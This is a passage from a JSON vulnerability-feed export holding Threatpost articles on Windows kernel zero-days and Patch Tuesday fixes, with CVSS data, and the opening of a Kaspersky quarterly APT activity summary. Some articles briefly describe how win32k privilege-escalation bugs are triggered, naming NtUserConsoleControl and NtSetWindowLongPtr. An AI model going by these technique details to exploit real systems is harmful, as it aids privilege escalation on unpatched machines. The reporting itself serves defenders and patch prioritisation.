KernelCallbackTable,and use the NtUserConsoleControl method to set the ConsoleWindow flag of the tagWND object, which will modify the window type.\u201d\n\nThe bug was being exploited by sophisticated groups as a zero-day issue, Microsoft said.\n\n> Regarding the just-fixed CVE-2022-21882: \nwin32k privilege escalation vulnerability, \nCVE-2021-1732 patch bypass,easy to exploit,which was used by apt attacks\n> \n> \u2014 b2ahex (@b2ahex) [January 12, 2022](<https://twitter.com/b2ahex/status/1481233350840893442?ref_src=twsrc%5Etfw>)\n\n## **Microsoft Needs to Up It\u2019s Bug Bounty Game? **\n\nJanuary\u2019s Patch Tuesday was plagued by [Windows server update issues](<https://threatpost.com/microsoft-yanks-buggy-windows-server-updates/177648/>) that could have understandably made internal security teams pause before downloading the patches. But a PoC is now available for the bug, putting exploitation in reach of cybercriminals of all levels of expertise.\n\nDabah said that Microsoft\u2019s bug-bounty program was problematic.\n\n> The reason I didn\u2019t disclose it, was because I waited to get paid by Msft for long time for other stuff. By the time they paid they reduced awards to nothing almost. I was already busy with my startup and that\u2019s the story how it went unfixed. [@ja_wreck](<https://twitter.com/ja_wreck?ref_src=twsrc%5Etfw>) <https://t.co/PtRuNDAEYQ>\n> \n> \u2014 Gil Dabah (@_arkon) [January 28, 2022](<https://twitter.com/_arkon/status/1487005745023537157?ref_src=twsrc%5Etfw>)\n\nInvesting in the program was the primary recommendation in RyeLv\u2019s technical analysis to Microsoft.\n\nHe noted how to \u201ckill the bug class\u201d: \u201cImprove the kernel zero-day bounty, let more security researchers participate in the bounty program, and help the system to be more perfect.\u201d\n\nIt should be noted that Microsoft has been willing to throw additional funding at [bug-bounty programs](<https://threatpost.com/microsoft-30k-teams-bugs/165037/>) for other high-profile products, including last spring\u2019s announcement the company would pay up to $30,000 for Teams bugs.\n\nThe computing giant did not immediately return a request for comment.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-31T21:59:35", "type": "threatpost", "title": "Public Exploit Released for Windows 10 Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-01-31T21:59:35", "id": "THREATPOST:9673D04DAD513AC05EA6440633D75339", "href": "https://threatpost.com/public-exploit-windows-10-bug/178135/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:54:27", "description": "Microsoft followed through and today patched a zero-day vulnerability being exploited in public attacks that was [disclosed by Google researchers](<https://threatpost.com/google-reveals-windows-kernel-zero-day-under-attack/121689/>) nine days ago.\n\nThe victims have yet to have been identified, but [Microsoft did accuse the Sofacy APT gang](<https://threatpost.com/microsoft-says-russian-apt-group-behind-zero-day-attacks/121722/>) of carrying out the attacks. Sofacy is generally thought to have ties to Russian military intelligence and its targets are strategic, such as government and diplomatic agencies, military and defense contractors, and public policy think-tanks.\n\nGoogle\u2019s disclosure on Oct. 31 came 10 days after it privately reported the vulnerability to Microsoft, along with a Flash zero day to Adobe also used in these attacks.\n\nAdobe patched the Flash vulnerability with an [emergency update](<https://threatpost.com/adobe-patches-flash-zero-day-under-attack/121567/>) released on Oct. 26, but Microsoft failed to publicly acknowledge the bug until only after Google publicly disclosed it. Google\u2019s internal policy gives vendors seven days to publicly report or patch vulnerabilities being actively exploited.\n\nGoogle said the vulnerability is a local privilege escalation in the Windows kernel that leads to a sandbox escape.\n\n\u201cIt can be triggered via the win32k.sys system call NtSetWindowLongPtr() for the index GWLP_ID on a window handle with GWL_STYLE set to WS_CHILD,\u201d Google\u2019s Neel Mehta and Billy Leonard said in their [disclosure](<https://security.googleblog.com/2016/10/disclosing-vulnerabilities-to-protect.html>).\n\nThe attackers chained this bug and the Flash zero day in order to get on targeted computers. The sandbox escape allows the attacker to run code in kernel mode.\n\n\u201cMicrosoft implemented new exploit mitigations in the Windows 10 Anniversary Update version of the win32k kernel component,\u201d Microsoft said in its bulletin, [MS16-135](<https://technet.microsoft.com/library/security/MS16-135>). \u201cThese Windows 10 Anniversary Update mitigations, which were developed based on proactive internal research, stop all observed in-the-wild instances of this exploit.\u201d\n\nMS16-135 also patched two other elevation of privilege vulnerabilities in the Windows kernel (CVE-2016-7215 and CVE-2016-7246), as well as an information disclosure bug in the kernel that opens the door for a kernel ASLR bypass (CVE-2016-7214), and a separate information disclosure bug in the Windows browser.sys kernel-mode driver (CVE-2016-7218).\n\nSix of the 14 bulletins put out by Microsoft today are rated critical. One, [MS16-132](<https://technet.microsoft.com/library/security/MS16-132>), included another vulnerability under attack in the Windows Graphics Component. Microsoft said a remote code execution Open Type Font vulnerability was patched in the Windows font library.\n\nThat bulletin patched three other flaws, including an information disclosure flaw in Open Type Font, specifically in the ATMFD component, which leaks enough information to carry out a further compromise. Also addressed was a remote code execution memory corruption vulnerabilities in Windows Animation Manager and Windows Media Foundation.\n\nMicrosoft also provided cumulative updates for its browsers, Edge and Internet Explorer. The Edge update, [MS16-129](<https://technet.microsoft.com/library/security/MS16-129>), patched 17 vulnerabilities, most of which lead to remote code execution. Two of the flaws, CVE-2016-7209 and CVE-2016-7199, were publicly disclosed, Microsoft said, but not used in in-the-wild attacks. The second disclosed bug was also patched in the Internet Explorer update, [MS16-142](<https://technet.microsoft.com/library/security/MS16-142>), which patched seven CVEs.\n\n[MS16-130](<https://technet.microsoft.com/library/security/MS16-130>) patched three critical Windows bugs, a remote code execution flaw in the way Windows\u2019 image file loading handles malformed image files, along with two elevation of privilege flaws in Windows IME and Windows Task Scheduler.\n\nAnother remote code execution vulnerability was addressed in [MS16-131](<https://technet.microsoft.com/library/security/MS16-131>) in the Microsoft Video Control component. The remaining critical bulletin is the Adobe Flash Player update for IE and Edge; Adobe released an update today for Flash Player patching [nine remote code execution flaws](<https://threatpost.com/adobe-patches-nine-code-execution-flaws-in-flash-player/121839/>) in the software.\n\nThough rated important by Microsoft, an Office bulletin, [MS16-133](<https://technet.microsoft.com/library/security/MS16-133>), also merits attention because it patches a dozen vulnerabilities including 10 that lead to remote code execution. None of the Office bugs are being publicly attacked, Microsoft said.\n\nMicrosoft also patched SQL Server, addressing a half-dozen elevation of privilege and information disclosure vulnerabilities in [MS16-136](<https://technet.microsoft.com/library/security/MS16-136>). Three of the EoP bugs are in the SQL Server RDBMS engine, along with a cross-site scripting flaw in SQL Server MDS, an information disclosure issue in SQL Analysis Services, and another EoP issue in the SQL Server Engine Server Agent.\n\n\u201cThe top priority for most administrators will be to quickly deploy fixes for browsers, graphics components, and Office. All of these components are affected by one or more code execution vulnerabilities Microsoft has classified as highly exploitable,\u201d said Craig Young, security researcher at Tripwire. \u201cThese are of the highest priority due to the fact that the vulnerabilities can potentially be triggered through normal web browsing activities giving an external attacker a way into networks.\u201d\n\nThe remaining bulletins are also rated important:\n\n * [MS16-134](<https://technet.microsoft.com/library/security/MS16-134>) patches 10 elevation of privilege flaws in the Windows Common Log File System (CLFS)\n * [MS16-137](<https://technet.microsoft.com/library/security/MS16-137>) patches three vulnerabilities in Windows NTLM, Virtual Secure Mode and Local Security Authority Subsystem Service\n * [MS16-138](<https://technet.microsoft.com/library/security/MS16-138>) patches four elevation of privilege vulnerabilities in the Windows Virtual Hard Disk Driver\n * [MS16-139](<https://technet.microsoft.com/library/security/MS16-139>) patches a local Windows kernel elevation of privilege flaw in how the Windows Kernel API enforces permissions\n * [MS16-140](<https://technet.microsoft.com/library/security/MS16-140>) patches a security feature bypass in the Windows Secure Boot component; an attacker could disable code integrity checks and allow test-signed executables and drivers to be loaded.\n", "cvss3": {}, "published": "2016-11-08T14:57:26", "type": "threatpost", "title": "Microsoft Patches Zero Day Disclosed by Google", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-7199", "CVE-2016-7209", "CVE-2016-7214", "CVE-2016-7215", "CVE-2016-7218", "CVE-2016-7246", "CVE-2016-7255"], "modified": "2016-11-08T20:23:12", "id": "THREATPOST:F10810414F1898BE0159A069C1B719B2", "href": "https://threatpost.com/microsoft-patches-zero-day-disclosed-by-google/121851/", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-02-09T22:45:30", "description": "Microsoft has addressed nine critical-severity cybersecurity bugs in February\u2019s Patch Tuesday updates, plus an important-rated vulnerability that is being actively exploited in the wild.\n\nSix of the security holes \u2013 including one of the critical bugs \u2013 were already publicly disclosed.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nOverall, the computing giant has released patches for 56 CVEs covering Microsoft Windows components, the .NET Framework, Azure IoT, Azure Kubernetes Service, Microsoft Edge for Android, Exchange Server, Office and Office Services and Web Apps, Skype for Business and Lync, and Windows Defender.\n\n## **Actively Exploited Security Bug in Windows Kernel**\n\nThe security bug tracked as [CVE-2021-1732](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1732>)** **is being actively exploited, according to Microsoft\u2019s advisory. It carries a vulnerability-severity rating of 7.8 on the CVSS scale, making it important in severity \u2013 however, researchers said it deserves attention above some of the critical bugs in terms of patching priority.\n\nIt exists in the Windows Win32k operating system kernel and is an elevation-of-privilege (EoP) vulnerability. It would allow a logged-on user to execute code of their choosing with higher privileges, by running a specially crafted application. If successful, attackers could execute code in the context of the kernel and gain SYSTEM privileges, essentially giving the attacker free rein to do whatever they wanted on the compromised machine.\n\n\u201cThe vulnerability affects Windows 10 and corresponding server editions of the Windows OS,\u201d said Chris Goettl, senior director of product management and security at Ivanti. \u201cThis is a prime example of why risk-based prioritization is so important. If you base your prioritization off of vendor severity and focus on \u2018critical\u2019 you could have missed this vulnerability in your prioritization. This vulnerability should put Windows 10 and Server 2016 and later editions into your priority bucket for remediation this month.\u201d\n\n## **Critical Microsoft Bugs for February Patch Tuesday**\n\nNone of the critical bugs rate more than an 8.8 (out of 10) on the CVSS scale, but all allow for remote code execution (RCE) and many should take top priority, according to security researchers.\n\n * ### Publicly Known .NET Core/Visual Studio Bug\n\nFor instance, the bug tracked as [CVE-2021-26701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26701>) exists in .NET Core and Visual Studio \u2013 it\u2019s the only critical-rated bug to be listed as publicly known.\n\n\u201cWithout more information from Microsoft, that\u2019s about all we know about it,\u201d said Dustin Childs, of Trend Micro\u2019s Zero Day Initiative, in [an analysis](<https://www.zerodayinitiative.com/blog/2021/2/9/the-february-2022-security-update-review>) released Tuesday. \u201cBased on the CVSS severity scale, this could allow remote, unauthenticated attackers to execute arbitrary code on an affected system. Regardless, if you rely on the .NET Framework or .NET Core, make sure you test and deploy this one quickly.\u201d\n\n * ### **Windows Fax Bugs**\n\nOther critical bugs should be on researchers\u2019 radars. The bugs tracked as [CVE-2021-1722](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1722>) and [CVE-2021-24077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24077>) meanwhile are both Windows Fax Service RCE problems.\n\n\u201cWindows Fax Service specifies settings for faxes, including how they are sent, received, viewed and printed,\u201d said Eric Feldman, senior product marketing manager at Automox. \u201cThe Windows Fax Service is used by the Windows Fax and Scan application included in all versions of Microsoft Windows 7, Windows 8 and Windows 10 and some earlier versions.\u201d\n\nAn attacker who successfully exploited either vulnerability could take control of an affected system, and then be able to install programs; view, change or delete data; or create new accounts with full user rights.\n\n\u201cUsers whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights,\u201d Feldman said. \u201cEven if you do not use Windows Fax and Scan, the Windows Fax Services is enabled by default.\u201d\n\n * ### **Critical TCP/IP Bugs**\n\n[CVE-2021-24074](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24074>) and [CVE-2021-24094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24094>) are both Windows TCP/IP RCE vulnerabilities. The former is found in the way Windows handles iPv4 source routing; the latter is found in the way Windows handles iPv6 packet reassembly.\n\n\u201cIPv4 source routing\u2026should be disabled by default,\u201d said Childs. \u201cYou can also block source routing at firewalls or other perimeter devices. The IPv6 bug involves packet fragmentation where a large number of fragments could lead to code execution.\u201d\n\nResearchers said that both these patches should be prioritized.\n\n\u201cBecause these affect the network stack, require zero interaction from a user and can be exploited by sending malicious network traffic to a device, it\u2019s only a matter of time before we see attackers leveraging these vulnerabilities to carry out cyberattacks,\u201d Chris Hass, director of information security and research at Automox, said.\n\nKevin Breen, director of cyber threat research at Immersive Labs, said that the IPv6 security hole is an obvious target for hackers.\n\n\u201cCVE-2021-24094 would be an obvious target because it affects a network stack, which typically operates with system level permissions and could therefore gain an attacker a system shell,\u201d he said. \u201cAs an IPV6 Link local attack it would require the threat actor to already have a foothold in your network, but could ultimately lead to a high level of access on domain controllers, for example. This vulnerability would be most dangerous to those who operate a flat network. Segmentation will help with mitigation.\u201d\n\nBreen also pointed out that RCE isn\u2019t the only possible outcome of an exploit for this bug.\n\n\u201cThe release notes indicate that the exploit is \u2018complex\u2019 \u2013 which means attempted attacks may serve to cause systems to crash, giving it the potential to be used in a denial-of-service attack,\u201d he said.\n\n * ### **Flaw in Windows Codec Pack**\n\nWindows Camera Codec Pack is home to yet another critical RCE bug ([CVE-2021-24091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24091>)). If successfully exploited, an attacker could run arbitrary code in the context of the current user.\n\n\u201cIf the current user is logged on with admin privileges, the attacker could gain control of the affected system,\u201d said Justin Knapp, senior product marketing manager at Automox. \u201cThis could enable an attacker to install programs; view, change, or delete data; or create new accounts with full user rights. Exploitation of the vulnerability requires the user to open a specially crafted file with an affected version of the codec pack. While there\u2019s no way to force a user to open the file, bad actors could manipulate a user through an email or web-based attack vector where the user is effectively convinced or enticed into opening the malicious file.\u201d\n\n * ### **Windows DNS Problems**\n\nAnd Windows Domain Name System (DNS) servers, when they fail to properly handle requests, are also open to a critical RCE bug ([CVE-2021-24078](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24078>)) that could allow an attacker to run arbitrary code in the context of the Local System Account.\n\n\u201cOnly Windows servers that are configured as DNS servers are at risk of having this vulnerability exploited,\u201d Knapp said. \u201cTo exploit the vulnerability, an unauthenticated attacker could send malicious requests to the Windows DNS server. Given the low level of attack complexity and \u2018exploitation more likely\u2019 label assigned, this is a vulnerability that should be addressed immediately.\u201d\n\n * ### **Windows Print Spooler**\n\nAlso of note, _[CVE-2021-24088](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24088>)_ affects the Windows Local Spooler, which is an important component within the Windows operating system that stores print jobs in memory until the printer is ready to accept them.\n\nIt\u2019s a bug that \u201ccould be a big concern,\u201d according to Allan Liska, senior security architect at Recorded Future.\n\n\u201cThis vulnerability impacts Windows 7 to 10 and Windows Server 2008 to 2019,\u201d he said. \u201cWindows Print Spooler vulnerabilities have been widely exploited in the wild going back to the days of Stuxnet. Just last year CVE-2020-0986 was seen by Kaspersky being [widely exploited in the wild.](<https://threatpost.com/windows-zero-day-circulating-faulty-fix/162610/>)\u201d\n\n * ### **Other Critical February 2021 Microsoft Bugs**\n\nAnd finally, .NET Core for Linux is also at risk for RCE ([CVE-2021-24112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24112>)); and [CVE-2021-24093](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24093>) is a critical RCE vulnerability in the Windows graphic component. Details are scant for both, but of the latter, Breen said, \u201cThis is the kind of vulnerability built into exploit kits and triggered by low level phishing campaigns targeting users en masse.\u201d\n\nAnd, a critical bug that would allow RCE exists in the Microsoft Windows Codecs Library ([CVE-2021-24081](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24081>)). Details are sparse, but Microsoft said that the difficulty required for exploitation is considered to be low. However, end-user interaction is required for successful exploitation.\n\n### **Publicly Disclosed Bugs of Note**\n\nOutside of the critical issues, [CVE-2021-1733](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1733>) is a high-severity EoP vulnerability discovered to be impacting Sysinternals PsExec utility that deserves a look. It\u2019s listed as being publicly disclosed.\n\n\u201cPsExec which has been popular in the past for use in remote administration tasks such as patching remote systems, has also had a fair share of scrutiny due the utility\u2019s weaponization by criminals in malware,\u201d Nicholas Colyer, senior product marketing manager at Automox, said via email. \u201cProof-of-concept code has not been independently verified but it is notable that in January 2021, Microsoft released a patch to resolve a remote code-execution vulnerability for the same utility, indicating that it is getting attention. Robust endpoint management is necessary for any organization\u2019s continued success and it is advisable to consider alternatives in the modern era of software-as-a-service.\u201d\n\nThe other publicly reported vulnerabilities this month are [CVE-2021-1727](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1727>), an EoP vulnerability in Windows Installer; [CVE-2021-24098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24098>), a DoS vulnerability in the Windows Console Driver; [CVE-2021-24106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24106>), an information-disclosure vulnerability in Windows DirectX; and [CVE-2021-1721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1721>), a .NET Core and Visual Studio DoS problem.\n\n## **Zerologon Redux**\n\nMicrosoft also again released the patch for the Netlogon vulnerability (CVE-2020-1472), which originally was resolved in August. The vulnerability has [consistently been exploited](<https://threatpost.com/microsoft-warns-zerologon-bug/160769/>) by threat actors, so the re-release serves to highlight its importance. Microsoft also starting Tuesday [began blocking by default](<https://threatpost.com/microsoft-implements-windows-zerologon-flaw-enforcement-mode/163104/>) any vulnerable connections on devices that could be used to exploit the flaw. It does this by enabling domain controller \u201cenforcement mode.\u201d\n\n\u201cWhen you consider that Zerologon led the U.S. government to issue an Emergency Directive to all federal agencies to promptly apply the patches for this vulnerability, you start to understand the gravity of the situation,\u201d Satnam Narang, staff research engineer at Tenable, told Threatpost. \u201cZerologon provides attackers a reliable way to move laterally once inside a network, giving them the ability to impersonate systems, alter passwords, and gain control over the proverbial keys to the kingdom via the domain controller itself.\u201d\n\nHe added, \u201cFor these reasons, Zerologon has been rolled into attacker playbooks, becoming a feather in the cap for post-compromise activity. We\u2019ve also seen reports of Zerologon being favored by ransomware groups like Ryuk during their campaigns.\u201d\n\n## **What Should IT Patch First?**\n\n\u201cWindows OS updates and [Adobe Acrobat and Reader](<https://threatpost.com/critical-adobe-windows-flaw/163789/>) need immediate attention with the list of exploited and publicly disclosed vulnerabilities,\u201d said Goettl.\n\nAfter that, development tools and IT tools \u201cneed some attention,\u201d he added.\n\n\u201c.Net Core and PsExec disclosures are a concern that should not go unaddressed. Because this development and IT tools do not follow the same update process as OS and application updates, it is important to review your DevOps processes and determine if you are able to detect and respond to updates for common dev components,\u201d he said. \u201cFor tools like PsExec it is important to understand your software inventory and where these tools are installed and ensure you can distribute updated versions as needed.\u201d\n\n**_Is your business an easy mark? _**_Save your spot for \u201c15 Cybersecurity Gaffes SMBs Make,\u201d **a **_**[_FREE Threatpost webinar_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>) **_**on Feb. 24 at 2 p.m. ET.** Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. __[Register here](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)__ for the Wed., Feb. 24 LIVE webinar. _\n", "cvss3": {}, "published": "2021-02-09T22:33:08", "type": "threatpost", "title": "Actively Exploited Windows Kernel Bug Allows Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0986", "CVE-2020-1472", "CVE-2021-1721", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1732", "CVE-2021-1733", "CVE-2021-24074", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24081", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24106", "CVE-2021-24112", "CVE-2021-26701"], "modified": "2021-02-09T22:33:08", "id": "THREATPOST:1502920D4F50B0D128077B515815C023", "href": "https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2021-04-27T12:27:51", "description": "\n\nFor four years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q1 2021.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## The most remarkable findings\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised. This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia. In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation. Further investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group. The shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\nOn March 2, Microsoft reported a new APT actor named HAFNIUM, exploiting four zero-days in Exchange Server in what they called "limited and targeted attacks". At the time, Microsoft claimed that, in addition to HAFNIUM, several other actors were exploiting them as well. In parallel, Volexity also reported the same Exchange zero-days being in use in early 2021. According to Volexity's telemetry, some of the exploits in use are shared across several actors, besides the one Microsoft designates as HAFNIUM. Kaspersky telemetry revealed a spike in exploitation attempts for these vulnerabilities following the public disclosure and patch from Microsoft. During the first week of March, we identified approximately 1,400 unique servers that had been targeted, in which one or more of these vulnerabilities were used to obtain initial access. Prior to the posts, on February 28, we identified related exploitation on less than a dozen Exchange systems; we also found more than a dozen Exchange artefacts indicating exploitation uploaded to multi-scanner services. According to our telemetry, most exploitation attempts were observed for servers in Europe and the United States. Some of the servers were targeted multiple times by what appear to be different threat actors (based on the command execution patterns), suggesting the exploits are now available to multiple groups.\n\nWe have also discovered a campaign active since mid-March targeting governmental entities in the Russian Federation, using the aforementioned Exchange zero-day exploits. This campaign made use of a previously unknown malware family we dubbed FourteenHi. Further investigation revealed traces of activity involving variants of this malware dating back a year. We also found some overlaps in these sets of activities with HAFNIUM in terms of infrastructure and TTPs as well as the use of ShadowPad malware during the same timeframe.\n\n## Europe\n\nDuring routine monitoring of detections for FinFisher spyware tools, we discovered traces that point to recent FinFly Web deployments. In particular, we discovered two servers with web applications that we suspect, with high confidence, were generated using FinFly Web. FinFly Web is, in essence, a suite of tools and packages that implement a web-based exploitation server. It was first publicly documented in 2014, in the aftermath of the Gamma Group hacking incident. One of the suspected FinFly Web servers was active for more than a year between October 2019 and December 2020. This server was disabled a day after our discovery last December. Nevertheless, we were able to capture a copy of its landing page, which included JavaScript used to profile victims using what appears to be previously unknown code. In the second case, the server hosting FinFly Web was already offline at the moment of discovery, so we drew our conclusions using available historical data. As it turned out, it was active for a very short time around September 2020 on a host that appears to have been impersonating the popular Mail.ru service. Surprisingly, this server began answering queries again on January 12. So far, we haven't seen any related payloads being dropped by these web pages.\n\n## Russian-speaking activity\n\nKazuar is a .NET backdoor usually associated with the Turla threat actor (aka Snake and Uroboros). Recently, Kazuar received renewed interest due to its similarities with the Sunburst backdoor. Although the capabilities of Kazuar have already been exposed in public research, many interesting facts about this backdoor were not made public. Our latest reports focus on the changes the threat actor made to the September and November versions of its backdoor.\n\nOn February 24, the National Security Defense Council of Ukraine (NSDC) publicly warned that a threat actor had exploited a national documents circulation system (SEI EB) to distribute malicious documents to Ukrainian public authorities. The alert contained a few related network IoCs, and specified that the documents used malicious macros in order to drop an implant onto targeted systems. Thanks to the shared IoCs, we were able to attribute this attack, with high confidence, to the Gamaredon threat actor. The malicious server IP mentioned by the NSDC has been known to Kaspersky since February as Gamaredon infrastructure.\n\nOn January 27, the French national cybersecurity agency (ANSSI) published a report describing an attack campaign that targeted publicly exposed and obsolete Centreon systems between 2017 and 2020, in order to deploy Fobushell (aka P.A.S.) webshells and Exaramel implants. ANSSI associated the campaign with the Sandworm intrusion-set, which we refer to as Hades. Although we specifically looked for additional compromised Centreon systems, Exaramel implant samples or associated infrastructure, we were unable to retrieve any useful artifacts from which we could initiate a comprehensive investigation. However, we did identify three Centreon servers where a Fobushell webshell had been deployed. One of those Fobushell samples was identical to another we previously identified on a Zebrocy C2 server.\n\n## Chinese-speaking activity\n\nWe discovered a set of malicious activities, which we named EdwardsPheasant, targeting mainly government organizations in Vietnam since June 2020. The attackers leverage previously unknown and obfuscated backdoors and loaders. The activities peaked in November 2020, but are still ongoing. The associated threat actor continues to leverage its tools and tactics (described in our private report) to compromise targets or maintain access in their networks. While we could identify similarities with the tools and tactics associated with Cycldek (aka Goblin Panda) and Lucky Mouse (aka Emissary Panda), we have been unable to attribute this set of activities to either of them conclusively.\n\nWe investigated a long-running espionage campaign, dubbed A41APT, targeting multiple industries, including the Japanese manufacturing industry and its overseas bases, which has been active since March 2019. The attackers used vulnerabilities in an SSL-VPN product to deploy a multi-layered loader we dubbed Ecipekac (aka DESLoader, SigLoader and HEAVYHAND). We attribute this activity to APT10 with high confidence. Most of the discovered payloads deployed by this loader are fileless and have not been seen before. We observed SodaMaster (aka DelfsCake, dfls and DARKTOWN), P8RAT (aka GreetCake and HEAVYPOT), and FYAnti (aka DILLJUICE Stage 2) which in turn loads QuasarRAT. In November and December 2020, two public blog posts were published about this campaign. One month later, we observed new activities from the actor with an updated version of some of their implants designed to evade security products and make analysis harder for researchers. You can read more in our [public report](<https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/>).\n\n## Middle East\n\nWe recently came across previously unknown malicious artifacts that we attributed to the Lyceum/Hexane threat group, showing that the attackers behind it are still active and have been developing their toolset during the last year. Although Lyceum still prefers taking advantage of DNS tunneling, it appears to have replaced the previously documented .NET payload with a new C++ backdoor and a PowerShell script that serve the same purpose. Our telemetry revealed that the threat group's latest endeavors are focused on going after entities within one country \u2013 Tunisia. The victims we observed were all high-profile Tunisian organizations, such as telecommunications or aviation companies. Based on the targeted industries, we assume that the attackers may have been interested in compromising these entities to track the movements and communications of individuals that are of interest to them. This could mean that the latest Lyceum cluster has an operational focus on targeting Tunisia, or that it is a subset of broader activity that is yet to be discovered.\n\nOn November 19, 2020, Shadow Chaser Group tweeted about a suspected MuddyWater APT malicious document potentially targeting a university in the United Arab Emirates. Based on our analysis since then, we suspect this intrusion is part of a campaign that started at least in early October 2020 and was last seen active in late December 2020. The threat actor relied on VBS-based malware to infect organizations from government, NGO and education sectors. Our telemetry, however, indicates that no further tools were deployed and we do not believe that data theft took place either. This indicates to us that the attackers are currently in the reconnaissance phase of their operation, and we expect subsequent waves of attacks to follow in the near future. In our private report, we provide an in-depth analysis of the malicious documents used by this threat actor and study their similarities to known MuddyWater tooling. The infrastructure setup and communications scheme are also similar to past incidents attributed to this group. The actor maintains a small set of first-stage C2 servers to connect back from the VBS implant for initial communications. Initial reconnaissance is performed by the actor and communication with the implant is handed off to a second-stage C2 for additional downloads. Finally, we present similarities with known TTPs of the MuddyWater group and attribute this campaign to them with medium confidence.\n\nDomestic Kitten is a threat group mainly known for its mobile backdoors. The group's operations were exposed in 2018, showing that it was conducting surveillance attacks against individuals in the Middle East. The threat group targeted Android users by sending them popular and well-known applications that were backdoored and contained malicious code. Many of the applications had religious or political themes and were intended for Farsi, Arabic and Kurdish speakers, possibly alluding to this attack's main targets. We have discovered new evidence showing that Domestic Kitten has been using PE executables to target victims using Windows since at least 2013, with some evidence that it goes back to 2011. The Windows version, which, to the best of our knowledge, has not been described in the past, was delivered in 